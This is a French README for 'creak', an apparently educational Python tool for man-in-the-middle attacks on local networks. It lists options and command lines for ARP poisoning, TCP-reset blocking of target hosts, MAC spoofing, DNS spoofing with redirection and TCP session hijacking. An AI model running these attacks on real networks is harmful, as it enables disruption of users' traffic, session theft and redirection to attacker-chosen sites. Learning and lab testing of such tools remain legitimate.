
Script MITM d'empoisonnement, de réinitialisation, d'usurpation et de redirection
Effectue certaines des plus célèbres attaques MITM sur des adresses cibles situées dans un réseau local. Parmi celles-ci, bloquer les capacités de navigation et de téléchargement d'un hôte cible dans le réseau local en réalisant une attaque par empoisonnement ARP et en envoyant des paquets TCP de réinitialisation à chaque requête faite au routeur. Né comme un projet didactique pour apprendre le langage Python, je décline toute responsabilité en cas d'abus, y compris l'utilisation malveillante ou illégale de ce code.
$ git clone https://github.com/codepr/creak.git
$ cd creak
$ python setup.py install
ou simplement cloner le dépôt et exécuter creak.py après avoir installé toutes les dépendances :
$ git clone https://github.com/codepr/creak.git
Il est nécessaire d'avoir installé les bibliothèques pcap pour la manipulation brute de paquets et le module dpkt. Pour les options d'usurpation DNS, il est nécessaire d'installer le module dnet du paquet libdnet, à ne pas confondre avec le module pydnet (outil d'évaluation réseau). Il peut également utiliser scapy si souhaité, il suffit de le définir dans le fichier de configuration config à la section [output] > ENGINE.
Usage: creak.py [options] dev
Options:
-h, --help show this help message and exit
-1, --sessions-scan Sessions scan mode
-2, --dns-spoof Dns spoofing
-3, --session-hijack Try to steal a TCP sessions by desynchronization (old technique)
-x, --spoof Spoof mode, generate a fake MAC address to be used
during attack
-m MACADDR Mac address octet prefix (could be an entire MAC
address in the form AA:BB:CC:DD:EE:FF)
-M MANUFACTURER Manufacturer of the wireless device, for retrieving a
manufactur based prefix for MAC spoof
-s SOURCE Source ip address (e.g. a class C address like
192.168.1.150) usually the router address
-t TARGET Target ip address (e.g. a class C address like
192.168.1.150), can be specified multiple times
-p PORT Target port to shutdown
-a HOST Target host that will be redirect while navigating on
target machine
-r REDIR Target redirection that will be fetched instead of host
on the target machine
-v, --verbose Verbose output mode
-d, --dotted Dotted output mode
Utilisation la plus basique : Bloquer tout le trafic vers l'hôte cible
$ python creak.py -t 192.168.1.30 wlan0
Définir une passerelle différente :
$ python creak.py -s 192.168.1.2 -t 192.168.1.30 wlan0
Définir une adresse MAC différente pour l'appareil :
$ python creak.py -m 00:11:22:33:44:55 -t 192.168.1.30 wlan0
Usurper une adresse MAC en en générant une fausse :
$ python creak.py -x -t 192.168.1.30 wlan0
Usurper une adresse MAC en en générant une basée sur le fabricant (ex : Xeros) :
$ python creak.py -x -M xeros -t 192.168.1.30 wlan0
Usurpation DNS utilisant une fausse adresse MAC, redirigeant ab.xy vers cd.xz (ex : localhost) :
$ python creak.py -x -M xeros -t 192.168.1.30 -a www.ab.xy -r www.cd.xz wlan0
Bloquer plusieurs hôtes dans le sous-réseau :
$ python creak.py -x -t 192.168.1.30 -t 192.168.1.31 -t 192.168.1.32 wlan0
Voir le fichier CHANGELOG.
Scapy (commencé)Voir le fichier LICENSE pour les droits et limitations de la licence (GNU v3).